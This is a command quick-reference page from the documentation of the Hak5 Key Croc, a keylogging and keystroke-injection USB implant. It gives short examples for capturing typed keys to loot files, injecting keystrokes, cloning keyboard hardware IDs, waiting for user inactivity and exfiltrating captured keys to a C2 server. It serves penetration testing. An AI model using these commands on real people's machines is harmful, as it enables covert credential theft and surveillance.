Key Croc
Search…
The Key Croc by Hak5
Getting Started
Key Croc Basics
Configuration
Files and Directory Structure
Default Settings
Getting the Key Croc Online
Configuring Cloud C²
Understanding Languages
Beginner Guides
Password Sniffing with the Key Croc — Easy, or Super Easy?
New Features in Key Croc 1.3
Payloads and Loot
Payload Primer
Getting Payloads
Activating and Deactivating Payloads
Loot
Advanced Usage
Serial Console Access
Updating the Firmware
Factory Reset
Writing Payloads
Key Croc Payload Development
The MATCH Command
The SAVEKEYS Command
The ATTACKMODE Command
Hardware ID Cloning
The QUACK Command
Advanced QUACK Commands
The LED Command
Ducky Script Commands
Command Quick Reference
Tips & Tricks
Understanding the File System
Interactive Payload Development
Installing Extras like Metasploit
Helpful Payload Snippets
Product Information
Important Safety Information and Warnings
Specifications
Powered By GitBook
Command Quick Reference

MATCH <string or regular expression>

MATCH hello
Will trigger payload execution when specified pattern is typed.
See the MATCH article for full usage.

SAVEKEYS </path/to/file> <NEXT | LAST> <number of keystrokes 1-255>

MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6
Will save the specified number of keys to a file – either before (LAST) or after (NEXT) the payload MATCH.
See the SAVEKEYS article for full usage.

QUACK <keystrokes to inject>

QUACK STRING hello world
Will inject keystrokes specified. See the QUACK article for full usage.

QUACKFILE </path/to/keystroke-injection-strings>

QUACK /root/udisk/payloads/my_ducky_script.txt
Will inject keystrokes from the specified file. Ducky Script commands in the specified file should not be prepended with Q or QUACK.

ATTACKMODE <modes> <options>

ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337
Will emulate a USB device from the specified modes and options. See the ATTACKMODE article for full usage.

LED <status>

LED SETUP
Will control the multi-color LED. See the LED article for full usage.

GET_VARS
Will return a set of useful variables which may be referenced in the payload
  • $VID – Vendor ID cloned from attached keyboard or specified in config.txt
  • $PID – Product ID cloned from attached keyboard or specified in config.txt
  • $MAN – Manufacturer specified in config.txt
  • $SN – Serial number specified in config.txt
  • $PROD – Product string specified in config.txt
  • $HOST_IP – IP address of Key Croc after executing an Ethernet ATTACKMODE
  • $TARGET_IP – IP address of target after executing an Ethernet ATTACKMODE
  • $TARGET_HOSTNAME – Host name of the target after executing an Ethernet ATTACKMODE
The $LOOT variable is always available after MATCH triggers the payload. See the MATCH article for $LOOT details.

RELOAD_PAYLOADS
Will refresh the Key Croc framework with payload files from /root/udisk/payloads/

CHECK_PAYLOADS
Will check the syntax of the payloads currently residing in /root/udisk/payloads/

RECORD_PAYLOAD
Will parse each line entered, enabling interactive payload development with helpers.

ENABLE_PAYLOAD <payload_file_name>

ENABLE_PAYLOAD my_payload.txt
Will enable the specified payload. After enabling a payload, issue RELOAD_PAYLOADS for the change to take effect.

DISABLE_PAYLOAD <payload_file_name>

DISABLE_PAYLOAD my_payload.txt
After disabling a payload, issue RELOAD_PAYLOADS for the change to take effect.

INSTALL_EXTRAS
Will install additional third party software such as metasploit, impacket and responder to the /tools/ directory.

KEYBOARD
Will return PRESENT or MISSING depending on whether a keyboard is attached.

udisk [ mount | unmount | remount | reformat ]

WAIT_FOR_KEYBOARD_ACTIVITY <refresh interval in seconds>

WAIT_FOR_KEYBOARD_ACTIVITY 1
Will check for keyboard activity for each specified time interval, halting further payload execution until keyboard activity is detected. Example wait until there is keyboard activity within a 1 second window.

WAIT_FOR_KEYBOARD_INACTIVITY <seconds of inactivity required>

WAIT_FOR_KEYBOARD_INACTIVITY 300
Will check for keyboard inactivity, halting further payload execution until the specified time has elapsed with no keyboard activity. Example will wait until there have been no keypresses for 5 minutes (300 seconds)

WAIT_FOR_LOOT </path/to/file> (optional)<refresh interval in seconds>

WAIT_FOR_LOOT /root/loot/captured_keys.txt 5
Will wait for the specified file to exist, or if already existing for the file line count to increase, halting further payload execution. Can be used in conjunction with SAVEKEYS NEXT, which will write the loot file when the number of specified keys have been typed. Example will wait until the captured_keys.txtfile exists, checking every 5 seconds.

C2NOTIFY <INFO|WARN|ERROR> <MESSAGE>

C2NOTIFY INFO 'The cake is a lie'
Will send a notification to the configured Cloud C2 server. See the Configuring Cloud C2 article.

C2EXFIL (optional)STRING (required)<PATH> (optional)<SOURCE>

C2EXFIL STRING /root/loot/captured_keys.txt My_Payload
Will exfiltrate the specified file to the configured Cloud C2 server. See the Configuring Cloud C2 article.
Writing Payloads - Previous
Ducky Script Commands
Next - Tips & Tricks
Understanding the File System
Last modified 1yr ago
Copy link
On this page
MATCH
EXAMPLE
SAVEKEYS
EXAMPLE
QUACK
EXAMPLE
QUACKFILE
EXAMPLE
ATTACKMODE
EXAMPLE
LED
EXAMPLE
GET_VARS
RELOAD_PAYLOADS
CHECK_PAYLOADS
RECORD_PAYLOAD
ENABLE_PAYLOAD
EXAMPLE
DISABLE_PAYLOAD
EXAMPLE
INSTALL_EXTRAS
KEYBOARD
UDISK
WAIT_FOR_KEYBOARD_ACTIVITY
EXAMPLE
WAIT_FOR_KEYBOARD_INACTIVITY
EXAMPLE
WAIT_FOR_LOOT
EXAMPLE
C2NOTIFY
EXAMPLE
C2EXFIL
EXAMPLE